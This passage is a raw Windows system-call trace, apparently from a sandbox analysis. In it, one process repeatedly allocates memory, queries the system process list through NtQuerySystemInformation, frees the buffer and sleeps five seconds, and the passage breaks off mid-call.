NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.020] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.059] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.067] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.083] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.114] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.132] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.145] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.161] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.176] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.192] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.207] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.223] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.246] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.255] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.272] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.300] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.318] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.332] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.348] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.364] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0136.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0136.382] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0136.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0136.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0136.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0136.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0136.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 